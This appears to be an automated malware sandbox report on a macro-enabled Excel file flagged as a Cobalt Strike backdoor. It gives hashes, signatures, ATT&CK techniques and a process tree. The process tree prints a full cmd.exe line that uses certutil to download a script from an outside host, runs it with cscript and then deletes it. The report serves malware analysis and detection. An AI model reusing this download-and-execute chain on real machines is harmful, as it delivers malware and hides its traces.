Overview

overview

10

Static

static

8

120 seconds - Win. 10

windows10_x64

10

Analysis

  • max time kernel
    115s
  • max time network
    115s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    04-03-2021 04:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sbw_jscript.xlsm

  • Size

    12KB

  • MD5

    4a0c41bbcf0808d99b6ac38bee9387fa

  • SHA1

    f23168b828ce2080432793ca27443ae71c8fa466

  • SHA256

    6543e374acbfe9a3bcfa9a76cb743aaea934c1a1fce7c419b42c27b3fbb1f880

  • SHA512

    9ec2483860ad39e08a27b8acbc54a1110a424699a6ffbfbd7d752c870f4e980f30bb106f0ab472dc1fc4ed9fbaf2098019ab6249611c9847d0499dfa2e21a81b

Score
10/10
cobaltstrikebackdoortrojan

Malware Config

Signatures

  • Cobaltstrike

    Detected malicious payload which is part of Cobaltstrike.

    trojanbackdoorcobaltstrike
  • Blocklisted process makes network request 4 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\sbw_jscript.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3928
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} -Embedding
    1⤵
      PID:3116
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
      1⤵
        PID:3196
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c certutil -urlcache -split -f https://docs.healthmade.org//tc.js "%USERPROFILE%\\Documents\\tc.js" && cscript "%USERPROFILE%\\Documents\\tc.js" && del "%USERPROFILE%\\Documents\\tc.js"
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:1764
        • C:\Windows\System32\certutil.exe
          certutil -urlcache -split -f https://docs.healthmade.org//tc.js "C:\Users\Admin\\Documents\\tc.js"
          2⤵
            PID:2344
          • C:\Windows\System32\cscript.exe
            cscript "C:\Users\Admin\\Documents\\tc.js"
            2⤵
            • Blocklisted process makes network request
            PID:580

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Initial Access

        Execution

        Persistence

        Privilege Escalation

        Defense Evasion

        Credential Access

        Discovery

        Query Registry

        2
        T1012

        System Information Discovery

        2
        T1082

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\Documents\tc.js
          MD5

          5dd84ed24e14474850b4760861347b6a

          SHA1

          415dffb5d0780773c69a53109a4cea1b0209f5d2

          SHA256

          6faa1ef6526e81680ba03b4a0d6b351ebb11f61cbe230fea0202839974cae6df

          SHA512

          5355b4b191747e8fe9cf7f2bac7c1a990c3e7b0a79dff3b7db01ee754d00cb0de95b17f0ddf0b48e0f3fb6b0243ab633826e9653aaa686669b2d6ec97780e8ab

          Download Submit
        • memory/580-8-0x0000000000000000-mapping.dmp
          Download
        • memory/580-10-0x00007FF8E0000000-0x00007FF8E09A0000-memory.dmp
          Filesize

          9.6MB

          Download
        • memory/580-11-0x000001B9CD730000-0x000001B9CD732000-memory.dmp
          Filesize

          8KB

          Download
        • memory/580-12-0x000001B9CD738000-0x000001B9CD73A000-memory.dmp
          Filesize

          8KB

          Download
        • memory/580-13-0x000001B9CD740000-0x000001B9CD780000-memory.dmp
          Filesize

          256KB

          Download
        • memory/2344-7-0x0000000000000000-mapping.dmp
          Download
        • memory/3928-2-0x00007FF8C5770000-0x00007FF8C5780000-memory.dmp
          Filesize

          64KB

          Download
        • memory/3928-3-0x00007FF8C5770000-0x00007FF8C5780000-memory.dmp
          Filesize

          64KB

          Download
        • memory/3928-4-0x00007FF8C5770000-0x00007FF8C5780000-memory.dmp
          Filesize

          64KB

          Download
        • memory/3928-5-0x00007FF8C5770000-0x00007FF8C5780000-memory.dmp
          Filesize

          64KB

          Download
        • memory/3928-6-0x00007FF8E8EC0000-0x00007FF8E94F7000-memory.dmp
          Filesize

          6.2MB

          Download